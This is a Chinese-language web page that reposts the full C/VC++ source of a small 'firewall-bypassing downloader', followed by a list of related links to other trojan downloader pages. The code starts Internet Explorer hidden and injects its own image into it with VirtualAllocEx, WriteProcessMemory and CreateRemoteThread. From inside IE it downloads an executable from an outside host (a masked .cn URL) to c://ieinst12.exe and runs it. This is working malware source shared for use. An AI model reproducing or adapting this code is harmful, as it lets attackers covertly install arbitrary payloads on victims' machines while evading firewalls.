3k穿墙下载者VC源代码
来源:互联网 发布:书法审美 知乎 编辑:程序博客网 时间:2024/04/28 11:40
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
//#pragma comment(linker, "/OPT:NOWIN98") //取消这几行的注释,编译出的文件只有2K大小
//#pragma comment(linker, "/merge:.data=.text")
//#pragma comment(linker, "/merge:.rdata=.text")
//#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/ENTRY:main")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数
DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数
HANDLE processhandle;
DWORD pid;
HINSTANCE hshell,hurlmon;
void download() //注入使用的下载函数
{
hshell=LoadLibrary("Shell32.dll");
hurlmon=LoadLibrary("urlmon.dll");
(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
DOWNFILE(NULL,"http://www.xxxxxxx.cn/en/notepad.exe","c://ieinst12.exe",0, NULL);
SHELLRUN(0,"open","c://ieinst12.exe",NULL,NULL,5);
ExitProcess(0);
};
void main() //主函数
{
//1.得到IE路径,并运行
char iename[MAX_PATH],iepath[MAX_PATH];
ZeroMemory(iename,sizeof(iename));
ZeroMemory(iepath,sizeof(iepath));
GetWindowsDirectory(iepath,MAX_PATH);
strncpy(iename,iepath,3);
strcat(iename,"program files//Internet Explorer//IEXPLORE.EXE");
//strcat(iename,"windows//notepad.EXE");
WinExec(iename,SW_HIDE);
Sleep(500);
//2.得到 IE process handle
HWND htemp;
htemp=FindWindow("IEFrame",NULL);
GetWindowThreadProcessId(htemp,&pid);
processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
//3.分配内存
HMODULE Module;
LPVOID NewModule;
DWORD Size;
LPDWORD lpimagesize;
Module = GetModuleHandle(NULL);//进程映像的基址
//得到内存镜像大小
_asm
{
push eax;
push ebx;
mov ebx,Module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
Size=(DWORD)lpimagesize;
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置
//4.写内存,创建线程
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据
LPTHREAD_START_ROUTINE entrypoint;
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行
//5.关闭对象
CloseHandle(processhandle);
return;
}
- 3k穿墙下载者VC源代码
- Delphi编写无DLL版穿墙的下载者
- 无Dll插入进程,下载者VC源代码
- 无Dll插入进程、下载者VC源代码
- 无dll插入进程,下载者vc源代码
- 3K下载者.txt
- VC++中各种应用程序源代码下载网址
- vc++无进程式线程插入穿墙技术实现
- vc++编写一个木马下载器,体积仅有0.3K
- VC++1.5K字节实现下载并远程注入
- vc++编写一个木马下载器,体积仅有0.3K
- VC串口通信modbus协议源代码视频教程下载地址
- VC 下载者
- VC 下载者
- VC源代码
- android2.3源代码下载编译
- 3:下载 Commons beanutils 源代码
- Unity 使用TextMesh解决3D文字穿墙的问题
- Hibernate配置相关的类
- 无线网络密码破解方法
- 游戏开发中的数学和物理算法(3):点之间的距离
- Android Handler Message多线程实例
- 查询BSF资料总结【未写完】
- 3k穿墙下载者VC源代码
- 翻译:基于工具的以数据为中心的RIA开发方法
- 游戏开发中的数学和物理算法(4):抛物线
- set env export区别
- hdu1236(排名)
- eclipse中的乱码问题
- 游戏开发中的数学和物理算法(5):圆(2D)和球(3D)
- 作业——第1章 软件体系结构概述
- H3C EPON技术白皮书